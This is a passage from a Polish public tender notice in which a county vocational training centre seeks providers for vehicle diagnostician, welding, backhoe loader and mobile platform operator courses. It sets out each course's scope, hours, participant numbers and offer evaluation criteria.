pojazdu, w szczególności pod względem bezpieczeństwa jazdy i ochrony środowiska.<br/>- Szkolenie Specjalistyczne: w zakresie badania technicznego autobusu, którego dopuszczalna prędkość na autostradzie i drodze ekspresowej wynosi 100 km/h.<br/>- Szkolenie Specjalistyczne: w zakresie przeprowadzania badania technicznego pojazdu przeznaczonego do przewozu towarów niebezpiecznych.<br/>- Szkolenie Specjalistyczne: w zakresie przeprowadzania badań technicznego pojazdu przystosowanego do zasilania gazem.<br/>- Szkolenie Specjalistyczne: w zakresie przeprowadzania badania technicznego pojazdu:<br/>a)	związanego z badaniem pojazdu zarejestrowanego po raz pierwszy za granicą,<br/>b)	skierowanego przez organ kontroli ruchu drogowego lub starostę, o ile pojazd wymaga specjalistycznego badania,<br/>c)	w których dokonano zmian konstrukcyjnych lub wymiany elementów powodujących zmianę danych w dowodzie rejestracyjnym<br/><br/>Kompetencje jakie uzyska nauczyciel<br/>Nauczyciel po ukończeniu wsparcia uzyska kompetencje w zakresie diagnostyki samochodowej, przygotowania do egzaminu. <br/><br/>Warunki szczegółowe<br/>1.	Liczba osób objętych kursem 2 osoby (2 nauczycieli)<br/>2.	Czas trwania kursu: 116 godzin. <br/>3.	Uczestnikami/uczestniczkami kursu będą nauczyciele realizujący kształcenie zawodowe <br/>w zakresie przedmiotów mechanicznych, samochodowych zatrudniony w Powiatowym Centrum Kształcenia Zawodowego i Ustawicznego w Mroczkowie Gościnnym.<br/>4.	Wykonawca zapewni wykładowcę posiadającego uprawnienia do prowadzenia przedmiotowego kursu.<br/>5.	Zakres i realizacja kursu zgodnie z Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 28 listopada 2014 r. w sprawie szkolenia i egzaminowania diagnostów oraz wzorów dokumentów z tym związanych.<br/>6.	Realizacja kursu zgodnie z zakresem kursu. <br/>Nabyte umiejętności zostaną dokładnie określone w zaświadczeniu opracowanym przez Wykonawcę.<br/>7.	Harmonogram kursu opracowany przez Wykonawcę wymaga wcześniejszej akceptacji Dyrektora Powiatowego Centrum Kształcenia Zawodowego i Ustawicznego w Mroczkowie Gościnnym. <br/>8.	Właściwe udokumentowanie kursu na potrzeby realizacji projektu:<br/>-	przekazanie szczegółowego programu kursu;<br/>- weryfikacja nabytych umiejętności określonych w przedmiocie zamówienia;<br/>- potwierdzenie nabycia umiejętności określonych w przedmiocie zamówienia;<br/>- Wykonawca zobowiązany będzie do prowadzenia listy obecności, dziennika zajęć oraz przekazania ich Zamawiającemu po zakończonym kursie. <br/>9.	Po zakończeniu kursu uczestnicy otrzymają zaświadczenia opisujące zestaw nabytych kompetencji oraz liczbę godzin zrealizowanych zajęć określonych w pkt. 2.<br/>10.	Przedmiot zamówienia zawiera wydatki związane z pełną organizacją kursu m.in. wynagrodzenie kadry dydaktycznej posiadającej kwalifikacje zawodowe odpowiednie do prowadzenia kursu, odpowiednie pomieszczenia wyposażone w sprzęt i pomoce dydaktyczne, w tym maszyny umożliwiające prawidłową realizację kursu i przygotowanie do egzaminu zapewniające bezpieczne i higieniczne warunki szkolenia, wynajęcie i eksploatacja sal, sprzętu technicznego, wyposażenie sal niezbędnych do przeprowadzenia kursu, właściwe udokumentowanie przebiegu kursu o którym mowa w pkt. 8, zaświadczenia potwierdzające ukończenie kursu wraz z opisem uzyskanych umiejętności, obsługę administracyjną, materiały szkoleniowe, itp.<br/>11.	Termin wykonania: 4 miesiące od dnia podpisania umowy, nie później niż do 16.06.2023r.<br/>12.	Miejsce przeprowadzenia kursu wskazane przez Wykonawcę w max. odległości 150 km od Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Opis stosowanych kryteriów oraz sposób ich obliczenia.<br/>1.1. kryteria przyjęte do oceny ofert:<br/>a) „cena” C - 60% - maksymalna liczba pkt. do otrzymania 60 wg poniższego wzoru.<br/><br/> najniższa cena brutto spośród badanych ofert <br/>„C” : -----------------------------------------------------------x 60 % x 100 = liczba punktów<br/> cenę brutto badanej oferty <br/><br/>- obliczenia będą dokonywane do dwóch miejsc po przecinku<br/><br/>b) „doświadczenie osoby wyznaczonej do prowadzenia kursów/szkoleń” D - 40% – maksymalna liczba pkt. do otrzymania 40, które zostaną przyznane, na podstawie złożonego przez Wykonawcę oświadczenia zawartego w formularzu ofertowym, który stanowi załącznik nr 1 do SWZ. <br/>Przyznana zostanie następująca ilość punktów za w/w kryterium:<br/>- doświadczenie - powyżej 5 lat - 40 pkt<br/>- doświadczenie - powyżej 3 lat do 5 lat - 30 pkt.<br/>- doświadczenie - powyżej 1 roku do 3 lat - 10 pkt.<br/>- doświadczenie - do 1 roku – 0 pkt.<br/>Uwaga!<br/>Brak zaznaczenia lub zaznaczenie więcej niż jednej pozycji w formularzu ofertowym będzie skutkowało odrzuceniem oferty.<br/>1.2. Łączna ocena oferty:<br/>P = C + G<br/>P – łączna liczba punktów<br/>C – ilość punktów przyznanych Wykonawcy dla kryterium „Cena”<br/>D – ilość punktów przyznanych Wykonawcy dla kryterium „Doświadczenie osoby wyznaczonej do prowadzenia kursów/szkoleń”<br/>Zamawiający zastosuje zaokrąglenie każdego wyniku do dwóch miejsc po przecinku.<br/>2. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>3. Oceny dokonywać będą członkowie Komisji przetargowej, stosując zasadę, iż oferta nieodrzucona zawierająca łącznie najwyższą ilość punktów w w/w kryteriach jest ofertą najkorzystniejszą. Zamawiający przyjmie do porównania ofert ceny z uwzględnieniem podatku VAT, jaki będzie musiał zapłacić za wykonanie zamówienia (tj. wartości brutto złożonych ofert).<br/>4. Wyboru najkorzystniejszej oferty dokona Starosta Opoczyński, zatwierdzając propozycję Komisji przetargowej.<br/>5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wyznaczonej do prowadzenia kursów/szkoleń</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ III<br/>Kurs spawacza metodami: MIG /MAG /ELEKTRYCZNĄ – GRUPA MATERIAŁOWA 1.1<br/><br/>Zakres kursu<br/>Tematyka dla każdej metody spawania zawierać będzie m. in.: Główne zagadnienia: Ogólne wiadomości o spawaniu i spoinach (8 godz.); Materiałoznawstwo (8 godz.); Wady i niezgodności spoin (10 godz.); Budowa i działanie urządzeń spawalniczych (6 godz.); Wiadomości z zakresu bhp (8 godz.); Zajęcia praktyczne (40 godz.);<br/>Metoda MAG <br/>Polega na spawaniu za pomocą łuku elektrycznego, który powstaje między elektrodą topliwą, a spawanym materiałem. Zarówno łuk, jak i powstałe tzw. jeziorko ciekłego metalu są chronione strumieniem gazu osłonowego. Metoda MAG wykorzystywana jest do trwałego łączenia stali konstrukcyjnych niestopowych, niskostopowych i wysokostopowych.<br/>Metoda MIG <br/>Polega na spawaniu łukowym elektrodą topliwą w osłonie gazowej. Łączenie uzyskuje się poprzez stopienie metalu spawanych elementów i materiału dodatkowego temperaturą łuku elektrycznego. Osłona gazowa ma za zadanie chronić ciekły metal spoiny oraz miejsce spawania przed dostępem funkcjonujących w atmosferze gazów.<br/>Metoda elektryczna 111<br/>Polega na spawaniu łukowym ręcznym elektrodą otuloną. Efektywne połączenie powstaje w wyniku stopienia topliwej elektrody i materiału spawanego temperaturą łuku elektrycznego. Na spoinę złącza składają się metaliczny rdzeń elektrody, metaliczne składniki otuliny oraz nadtopione brzegi spawanego materiału.<br/><br/>Kompetencje jakie uzyska uczestnik kursu<br/>UCZESTNIK KURSU UZYSKA KOMPETENCJE przygotowujące do przystąpienia do egzaminu państwowego przed komisją powołaną przez Ośrodek Egzaminowania Spawaczy<br/><br/>Warunki szczegółowe<br/>1.	Liczba osób objętych kursem 20 osób.<br/>2.	Czas trwania jednego kursu (1 metoda): 80 godzin (40 godz. teoria, 40 godz. praktyka). <br/>Łącznie 240 godzin. <br/>3.	Uczestnikami/uczestniczkami kursu będą słuchacze kształcący się w Centrum Kształcenia Zawodowego i Ustawicznego w Powiatowym Centrum Kształcenia Zawodowego i Ustawicznego w Mroczkowie Gościnnym.<br/>4.	Wykonawca zapewni wykładowcę posiadającego uprawnienia do prowadzenia przedmiotowego kursu.<br/>5.	Realizacja kursu zgodnie z zakresem kursu. <br/>Nabyte umiejętności zostaną dokładnie określone w zaświadczeniu opracowanym przez Wykonawcę.<br/>6.	Zakres i realizacja kursu zgodnie z wytycznymi normy EN-ISO-9606-1 <br/>7.	Harmonogram kursu opracowany przez Wykonawcę wymaga wcześniejszej akceptacji Dyrektora Powiatowego Centrum Kształcenia Zawodowego i Ustawicznego w Mroczkowie Gościnnym. <br/>8.	Właściwe udokumentowanie kursu na potrzeby realizacji projektu:<br/>-	przekazanie szczegółowego programu kursu;<br/>- weryfikacja nabytych umiejętności określonych w przedmiocie zamówienia;<br/>- potwierdzenie nabycia umiejętności określonych w przedmiocie zamówienia;<br/>- Wykonawca zobowiązany będzie do prowadzenia listy obecności, dziennika zajęć oraz przekazania ich Zamawiającemu po zakończonym kursie. <br/>9.	Po zakończeniu kursu uczestnicy otrzymają zaświadczenia opisujące zestaw nabytych kompetencji oraz liczbę godzin zrealizowanych zajęć określonych w pkt. 2.<br/>10.	Po zdanym egzaminie kwalifikacyjnym uczestnik/uczestniczka uzyska dokument potwierdzający uzyskanie kwalifikacji w zakresie spawania metodami MIG /MAG /ELEKTRYCZNĄ tj. książkę spawacza i certyfikat wystawione przez właściwą Instytucję Certyfikującą - Ośrodek Egzaminowania Spawaczy.<br/>11.	Przedmiot zamówienia zawiera wydatki związane z pełną organizacją kursu m.in. badania lekarskie, przeprowadzenie kursu, koszt egzaminu oraz ewentualny koszt egzaminu poprawkowego (przewidziano 3 egzaminy poprawkowe na każdą z metod dla uczestnika kursu), wynagrodzenie kadry dydaktycznej posiadającej kwalifikacje zawodowe odpowiednie do prowadzenia kształcenia praktycznego i teoretycznego, odpowiednie pomieszczenia wyposażone w sprzęt i pomoce dydaktyczne, w tym maszyny umożliwiające prawidłową realizację kształcenia i przygotowanie do egzaminu zapewniające bezpieczne i higieniczne warunki nauki, wynajęcie <br/>i eksploatacja sal, sprzętu technicznego, wyposażenie sal niezbędnych do przeprowadzenia kursu, właściwe udokumentowanie przebiegu kursu o którym mowa w pkt. 8, zaświadczenia potwierdzające ukończenie kursu wraz z opisem uzyskanych umiejętności, obsługę administracyjną, materiały szkoleniowe, itp.<br/>12.	Rozliczenia za wykonanie usługi dokona się: <br/>a) za zrealizowanie kursu dla 20 osób objętych kursem, <br/>b) za faktyczną liczbę zrealizowanych egzaminów poprawkowych dla każdego z uczestników kursu (maksymalnie za 3 egzaminy poprawkowe dla uczestnika). <br/>13.	Termin wykonania: 4 miesiące od dnia podpisania umowy, nie później niż do 16.06.2023r.<br/>14.	Miejsce przeprowadzenia kursu: na terenie gminy Opoczno. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Opis stosowanych kryteriów oraz sposób ich obliczenia.<br/>1.1. kryteria przyjęte do oceny ofert:<br/>a) „cena” C - 60% - maksymalna liczba pkt. do otrzymania 60 wg poniższego wzoru.<br/><br/> najniższa cena brutto spośród badanych ofert <br/>„C” : -----------------------------------------------------------x 60 % x 100 = liczba punktów<br/> cenę brutto badanej oferty <br/><br/>- obliczenia będą dokonywane do dwóch miejsc po przecinku<br/><br/>b) „doświadczenie osoby wyznaczonej do prowadzenia kursów/szkoleń” D - 40% – maksymalna liczba pkt. do otrzymania 40, które zostaną przyznane, na podstawie złożonego przez Wykonawcę oświadczenia zawartego w formularzu ofertowym, który stanowi załącznik nr 1 do SWZ. <br/>Przyznana zostanie następująca ilość punktów za w/w kryterium:<br/>- doświadczenie - powyżej 5 lat - 40 pkt<br/>- doświadczenie - powyżej 3 lat do 5 lat - 30 pkt.<br/>- doświadczenie - powyżej 1 roku do 3 lat - 10 pkt.<br/>- doświadczenie - do 1 roku – 0 pkt.<br/>Uwaga!<br/>Brak zaznaczenia lub zaznaczenie więcej niż jednej pozycji w formularzu ofertowym będzie skutkowało odrzuceniem oferty.<br/>1.2. Łączna ocena oferty:<br/>P = C + G<br/>P – łączna liczba punktów<br/>C – ilość punktów przyznanych Wykonawcy dla kryterium „Cena”<br/>D – ilość punktów przyznanych Wykonawcy dla kryterium „Doświadczenie osoby wyznaczonej do prowadzenia kursów/szkoleń”<br/>Zamawiający zastosuje zaokrąglenie każdego wyniku do dwóch miejsc po przecinku.<br/>2. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>3. Oceny dokonywać będą członkowie Komisji przetargowej, stosując zasadę, iż oferta nieodrzucona zawierająca łącznie najwyższą ilość punktów w w/w kryteriach jest ofertą najkorzystniejszą. Zamawiający przyjmie do porównania ofert ceny z uwzględnieniem podatku VAT, jaki będzie musiał zapłacić za wykonanie zamówienia (tj. wartości brutto złożonych ofert).<br/>4. Wyboru najkorzystniejszej oferty dokona Starosta Opoczyński, zatwierdzając propozycję Komisji przetargowej.<br/>5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wyznaczonej do prowadzenia kursów/szkoleń</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ IV<br/>KURSU OPERATOR KOPARKOŁADOWARKI (100 GODZ.) <br/><br/>Zakres kursu<br/>Tematyka zawierać będzie m. in.: użytkowanie i obsługa maszyn roboczych (22 godz.); przedmioty specjalistyczne (20 godz.); wiadomości z zakresu BHP (8 godz.); obsługa koparkoładowarki - zajęcia praktyczne (50 godz.);<br/><br/>Kompetencje jakie uzyska uczestnik:<br/>UCZESTNIK KURSU UZYSKA KOMPETENCJE przygotowujące do przystąpienia do egzaminu państwowego przed komisją powołaną przez Sieć Badawcza Łukasiewicz – Warszawski Instytut Technologiczny.<br/><br/>Warunki szczegółowe<br/>1.	Liczba osób objętych kursem 30 osób.<br/>2.	Czas trwania kursu: 100 godzin (50 godz. teoria, 50 godz. praktyka).<br/>3.	Uczestnikami/uczestniczkami kursu będą słuchacze kształcący się w Centrum Kształcenia Zawodowego i Ustawicznego w Powiatowym Centrum Kształcenia Zawodowego i Ustawicznego <br/>w Mroczkowie Gościnnym.<br/>4.	Wykonawca zapewni wykładowcę posiadającego uprawnienia do prowadzenia przedmiotowego kursu.<br/>5.	Realizacja kursu zgodnie z zakresem kursu. <br/>Nabyte umiejętności zostaną dokładnie określone w zaświadczeniu opracowanym przez Wykonawcę.<br/>6.	Zakres i realizacja kursu zgodnie z programem uzgodnionym z Instytutem Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie - obecnie Sieć Badawcza Łukasiewicz – Warszawski Instytut Technologiczny.<br/>7.	Harmonogram kursu opracowany przez Wykonawcę wymaga wcześniejszej akceptacji Dyrektora Powiatowego Centrum Kształcenia Zawodowego i Ustawicznego w Mroczkowie Gościnnym. <br/>8.	Właściwe udokumentowanie kursu na potrzeby realizacji projektu:<br/>- przekazanie szczegółowego programu kursu;<br/>- weryfikacja nabytych umiejętności określonych w przedmiocie zamówienia;<br/>- potwierdzenie nabycia umiejętności określonych w przedmiocie zamówienia;<br/>- Wykonawca zobowiązany będzie do prowadzenia listy obecności, dziennika zajęć oraz przekazania ich Zamawiającemu po zakończonym kursie. <br/>9.	Po zakończeniu kursu uczestnicy otrzymają zaświadczenia opisujące zestaw nabytych kompetencji oraz liczbę godzin zrealizowanych zajęć określonych w pkt. 2.<br/>10.	Po zdanym egzaminie kwalifikacyjnym uczestnik/uczestniczka uzyska dokument potwierdzający uzyskanie kwalifikacji w zakresie operator koparkoładowarki tj. książeczkę operatora i świadectwo wystawione przez Instytucję egzaminującą Sieć Badawcza Łukasiewicz – Warszawski Instytut Technologiczny <br/>11.	Przedmiot zamówienia zawiera wydatki związane z pełną organizacją kursu m.in. badania lekarskie, przeprowadzenie kursu, koszt egzaminu oraz ewentualny koszt egzaminu poprawkowego (przewidziano 3 egzaminy poprawkowe dla uczestnika kursu), wynagrodzenie kadry dydaktycznej posiadającej kwalifikacje zawodowe odpowiednie do prowadzenia kształcenia praktycznego i teoretycznego, odpowiednie pomieszczenia wyposażone w sprzęt i pomoce dydaktyczne, w tym maszyny umożliwiające prawidłową realizację kształcenia i przygotowanie do egzaminu zapewniające bezpieczne i higieniczne warunki nauki, wynajęcie i eksploatacja sal, sprzętu technicznego, wyposażenie sal niezbędnych do przeprowadzenia kursu, właściwe udokumentowanie przebiegu kursu o którym mowa w pkt. 8, zaświadczenia potwierdzające ukończenie kursu wraz z opisem uzyskanych umiejętności, obsługę administracyjną, materiały szkoleniowe, itp.<br/>12.	Rozliczenia za wykonanie usługi dokona się: <br/>a) za zrealizowanie kursu dla 30 osób objętych kursem, <br/>b) za faktyczną liczbę zrealizowanych egzaminów poprawkowych dla każdego z uczestników kursu (maksymalnie za 3 egzaminy poprawkowe dla uczestnika). <br/>13.	Termin wykonania: 4 miesiące od dnia podpisania umowy, nie później niż do 16.06.2023r.<br/>14.	Miejsce przeprowadzenia kursu: na terenie gminy Opoczno. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Opis stosowanych kryteriów oraz sposób ich obliczenia.<br/>1.1. kryteria przyjęte do oceny ofert:<br/>a) „cena” C - 60% - maksymalna liczba pkt. do otrzymania 60 wg poniższego wzoru.<br/><br/> najniższa cena brutto spośród badanych ofert <br/>„C” : -----------------------------------------------------------x 60 % x 100 = liczba punktów<br/> cenę brutto badanej oferty <br/><br/>- obliczenia będą dokonywane do dwóch miejsc po przecinku<br/><br/>b) „doświadczenie osoby wyznaczonej do prowadzenia kursów/szkoleń” D - 40% – maksymalna liczba pkt. do otrzymania 40, które zostaną przyznane, na podstawie złożonego przez Wykonawcę oświadczenia zawartego w formularzu ofertowym, który stanowi załącznik nr 1 do SWZ. <br/>Przyznana zostanie następująca ilość punktów za w/w kryterium:<br/>- doświadczenie - powyżej 5 lat - 40 pkt<br/>- doświadczenie - powyżej 3 lat do 5 lat - 30 pkt.<br/>- doświadczenie - powyżej 1 roku do 3 lat - 10 pkt.<br/>- doświadczenie - do 1 roku – 0 pkt.<br/>Uwaga!<br/>Brak zaznaczenia lub zaznaczenie więcej niż jednej pozycji w formularzu ofertowym będzie skutkowało odrzuceniem oferty.<br/>1.2. Łączna ocena oferty:<br/>P = C + G<br/>P – łączna liczba punktów<br/>C – ilość punktów przyznanych Wykonawcy dla kryterium „Cena”<br/>D – ilość punktów przyznanych Wykonawcy dla kryterium „Doświadczenie osoby wyznaczonej do prowadzenia kursów/szkoleń”<br/>Zamawiający zastosuje zaokrąglenie każdego wyniku do dwóch miejsc po przecinku.<br/>2. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>3. Oceny dokonywać będą członkowie Komisji przetargowej, stosując zasadę, iż oferta nieodrzucona zawierająca łącznie najwyższą ilość punktów w w/w kryteriach jest ofertą najkorzystniejszą. Zamawiający przyjmie do porównania ofert ceny z uwzględnieniem podatku VAT, jaki będzie musiał zapłacić za wykonanie zamówienia (tj. wartości brutto złożonych ofert).<br/>4. Wyboru najkorzystniejszej oferty dokona Starosta Opoczyński, zatwierdzając propozycję Komisji przetargowej.<br/>5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wyznaczonej do prowadzenia kursów/szkoleń</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ V<br/>KURSU OPERATOR PODESTÓW RUCHOMYCH SAMOJEZDNYCH (PRZEJEZDNYCH, WOLNOBIEŻNYCH)<br/><br/>Zakres kursu<br/>Tematyka zawierać będzie m. in.: ogólne zagadnienia o podestach (3 godz.); budowa podestów (6 godz.); obsługa podestów-czynności operatora (8 godz.);wiadomości o dozorze technicznym (4 godz.); wiadomości z zakresu BHP (8 godz.); obsługa podestów-zajęcia praktyczne (10 godz.);<br/><br/>Kompetencje jakie uzyska uczestnik kursu<br/>UCZESTNIK KURSU UZYSKA KOMPETENCJE przygotowujące do przystąpienia do egzaminu przed Komisją Urzędu Dozoru Technicznego<br/><br/>Warunki szczegółowe<br/>1.	Liczba osób objętych kursem 20 osób.<br/>2.	Czas trwania kursu: 39 godzin (29 godz. teoria, 10 godz. praktyka).<br/>3.	Uczestnikami/uczestniczkami kursu będą słuchacze kształcący się w Centrum Kształcenia Zawodowego i Ustawicznego w Powiatowym Centrum Kształcenia Zawodowego i Ustawicznego <br/>w Mroczkowie Gościnnym.<br/>4.	Wykonawca zapewni wykładowcę posiadającego uprawnienia do prowadzenia przedmiotowego kursu.<br/>5.	Realizacja kursu zgodnie z zakresem kursu. <br/>Nabyte umiejętności zostaną dokładnie określone w zaświadczeniu opracowanym przez Wykonawcę.<br/>6.	Realizacja i zakres kursu zgodnie z programem kursu zatwierdzonym przez dozór techniczny.<br/>7.	Harmonogram kursu opracowany przez Wykonawcę wymaga wcześniejszej akceptacji Dyrektora Powiatowego Centrum Kształcenia Zawodowego i Ustawicznego w Mroczkowie Gościnnym. <br/>8.	Właściwe udokumentowanie kursu na potrzeby realizacji projektu:<br/>-	przekazanie szczegółowego programu kursu;<br/>-	weryfikacja nabytych umiejętności określonych w przedmiocie zamówienia;<br/>-	potwierdzenie nabycia umiejętności określonych w przedmiocie zamówienia;<br/>-	Wykonawca zobowiązany będzie do prowadzenia listy obecności, dziennika zajęć oraz przekazania ich Zamawiającemu po zakończonym kursie. <br/>9.	Po zakończeniu kursu uczestnicy otrzymają zaświadczenia opisujące zestaw nabytych kompetencji oraz liczbę godzin zrealizowanych zajęć określonych w pkt. 2.<br/>10.	Po zdanym egzaminie kwalifikacyjnym uczestnik/uczestniczka uzyska dokument potwierdzający uzyskanie kwalifikacji w zakresie: podesty ruchome przejezdne tj. zaświadczenie kwalifikacyjne wystawione przez Urząd Dozoru Technicznego. <br/>11.	Przedmiot zamówienia zawiera wydatki związane z pełną organizacją kursu m.in. badania lekarskie, przeprowadzenie kursu, koszt egzaminu oraz ewentualny koszt egzaminu poprawkowego (przewidziano 3 egzaminy poprawkowe dla uczestnika kursu), wynagrodzenie kadry dydaktycznej posiadającej kwalifikacje zawodowe odpowiednie do prowadzenia kształcenia praktycznego i teoretycznego, odpowiednie pomieszczenia wyposażone w sprzęt i pomoce dydaktyczne, w tym maszyny umożliwiające prawidłową realizację kształcenia i przygotowanie do egzaminu zapewniające bezpieczne i higieniczne warunki nauki, wynajęcie i eksploatacja sal, sprzętu technicznego, wyposażenie sal niezbędnych do przeprowadzenia kursu, właściwe udokumentowanie przebiegu kursu o którym mowa w pkt. 8, zaświadczenia potwierdzające ukończenie kursu wraz z opisem uzyskanych umiejętności, obsługę administracyjną, materiały szkoleniowe, itp.<br/>12.	Rozliczenia za wykonanie usługi dokona się: <br/>a) za zrealizowanie kursu dla 20 osób objętych kursem, <br/>b) za faktyczną liczbę zrealizowanych egzaminów poprawkowych dla każdego z uczestników kursu (maksymalnie za 3 egzaminy poprawkowe dla uczestnika). <br/>13.	Termin wykonania: 4 miesiące od dnia podpisania umowy, nie później niż do 16.06.2023r.<br/>14.	Miejsce przeprowadzenia kursu: na terenie gminy Opoczno. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Opis stosowanych kryteriów oraz sposób ich obliczenia.<br/>1.1. kryteria przyjęte do oceny ofert:<br/>a) „cena” C - 60% - maksymalna liczba pkt. do otrzymania 60 wg 